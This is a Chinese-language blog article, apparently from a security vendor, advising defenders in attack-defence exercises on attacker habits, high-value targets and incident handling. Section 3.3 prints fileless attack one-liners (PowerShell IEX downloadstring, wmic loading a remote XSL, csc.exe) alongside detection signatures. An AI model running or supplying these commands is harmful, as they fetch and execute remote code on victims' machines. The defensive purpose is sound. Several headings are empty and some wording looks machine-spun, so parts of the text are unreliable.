最近我们Sinesafe参加的几家机构的渗透测试防守方防护方案评估复查,部分防守方缺乏对攻击者的正确认知,攻击者的手法已经比较高超了,不扫描,不落地,污染日志等都很普及了。同时也要正确认知对手:攻防演练中,攻击者并非无所不能,他们面临着和防御方一样的问题:时间紧,任务重。所以攻击者的攻击目标,攻击手法也是有迹可循的,知己知彼才能百战百胜。
渗透测试
一、知彼
攻击者也是讲成本的,因此防守方最好的策略是:做的比其他防守方好一点点即可。好一点的含义:不在低级问题上犯错(弱密码、互联网应用远程RCE、管理后台暴露、重要we服务器未打补丁等)。对于“时间紧、任务重”的防守方来说,修建固若金汤的防线显然意味着大成本投入,以及最紧缺的时间,因此本文不会面面俱到,只选择性价比高值得快速投入的安全措施和大家分享。
攻击者一般:目标明确、步骤清晰、控制成本、反检测,反清理、三流分立。
目标明确:攻击者只攻击得分项,和必要路径(外网入口,内网立足点),对这些目标采取高等级手段,会隐蔽操作;对非必要路径顺路控制下来的we服务器,并不怕被发现,用起来比较随意,甚至主动制造噪音,干扰防守方。
步骤清晰:信息收集-控制入口-横向移动-维持权限-攻击目标系统。每一步都是经典操作和教科书式手法。
控制成本:
反检测,反清理:
三流分立:
3.检测阶段
渗透测试检测阶段
原则:若域不安全,最佳修复方案是重装。
3.3 主机防护(终端和we服务器)对抗
攻击者在尝试控制终端和we服务器时,为了绕过常规的杀毒软件,通常会使用一些免杀手段。而某些免杀手段(如白利用,样本不落地执行)由于非常稳定和高效,更是受到广大攻击者的青睐。
1.Powershell IEX组建下载执行.(文件在内存执行,不落硬盘)
利用代码示例:powershell.exe -nop -whidden -c IEX ((new-objectnet.webclient).downloadstring('aa'))">
监测特征:"IEX” AND “(New-Object Net.WebClient).DownloadString“
2.Windows系统白文件利用(wmic.exe
利用代码示例:cmd/c wmic os get /format:”\\x.x.x.x\1.xsl”&start/wait notepad
监测特征:"wmic os get" AND "/format"3.Windows系统白文件利用(csc.exe)
利用代码示例:
"C:/Windows/Microsoft.NET/Framework64/v2.0.50727/csc.exe"/noconfig /fullpaths@"C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline"
监测特征:"csc.exe" AND ("/r:System.EnterpriseServices.dll"OR "/unsafe")4.Windows系统白文件利用(msiexec.exe)
特征:被动执行后台执行的参数,有一定误报率。请自行研究,不再举例。
5.检测certutil白利用
特征:常见绕防火墙使用的参数。请自行研究,不再举例。
6.检测通过url.dll来进行不落地执行
请自行研究,不再举例。
3.4 账户和权限对抗
3.5 瞬间死亡
瞬间死亡有两种方式:路径打穿、系统打穿。
3.5.1 路径打穿
直接从未想过(未设防)的路径攻击过来。邮件是控制终端第一选择入口,具体防护可参见《公司企业安全建设指南:金融业内行业安全架构与技术时间》第16章:邮件安全。
边缘网包括包含无线和自助终端,包括包含:打卡机、自动售卖机、会议室设备、ATM机、排队机等。限制无线和自助终端互联网网络和内网浏览访问。
限制分支机构、外联公司企业等互联网网络和总部的互联网网络浏览访问。
不要相信理论上不能全通,但实际上存在全通内网的系统。(死于方便性)
3.5.2 系统打穿
系统打穿,都是血泪史。因为我们总是忘记了这些最大的风险源。优先攻击中心化的系统和跨两网的系统,包括包含终端安全管控控制台(控制台安全防护能力很弱)、运维管理系统/Zabbix/Nagios/堡垒机等、单点登录SSO系统、AD活动目录;
3.6 容易出问题的点
四、事中和事后
前面分享了很多防护和检测的事项,但防守方到了这个阶段,更重要的是考虑一下事中的各种过载信息的研判和快速应急处置措施。
我们打内部攻防演习的时候,最大的困扰是决策和处置。
4.1 过载信息研判
有效高速的决策机制,什么权限范围内的由什么人决策,这是授权。
什么岗位(人)负责什么,这是职责划分。例如谁负责跟踪每条告警信息到Closed状态?谁负责断网?谁负责样本分析?谁负责失陷主机排查?谁负责溯源路径?谁负责记录?谁负责汇报?等等。
4.2 快速应急处置
4.2.1 硬件和后勤
4.2.2 重要信息同步
4.2.3 各类应急处置措施
如果失陷(疑似)主机,决策用于诱饵,务必确保诱饵的风险可控,万一持续利用诱饵在内网横向移动,再进行限制就困难了。
注意体力分配,高水平攻击者通常使用扫描行为等方式来分散防守方精力。
4.3 渗透测试复检
攻防实战演习后的总结改进提高提升,才是最终目的。
4.3.1 防护薄弱点和改进措施
安全团队不好推动的工作,不好讲的话,要不到的资源,都可以在这里提出来。
应急处置薄弱点和改进措施,落实到人、计划和资源中,才是务实的。
4.3.3 资源不足,要资源
安全规划管理运营是必由之路,参见 金融业公司企业安全建设之路
7*24小时的安全规划管理运营,既然攻击对手是7*24小时的,为什么安全规划管理运营不是呢?
4.3.4 必要的管理层汇报
五、注意事项
不要影响业务。攻防演习前的加固,需要妥善评估对业务可用性影响,攻防演习中的应急处置,需要妥善评估对业务可用性影响,毕竟,业务可用性才是老大,安全不是,摆正心态和位置,如果对渗透测试有想法的朋友可以找专业的网站站点安全公司企业来处理解决,国内推荐Sinesafe,绿盟,启明星辰,等等的网站站点安全公司企业。
版权说明:Copyright © 广州京杭网络科技有限公司 2005-2025 版权所有 粤ICP备16019765号
广州京杭网络科技有限公司 版权所有
免费热线:400-683-0016
扫二维码关注公众号
当前位置: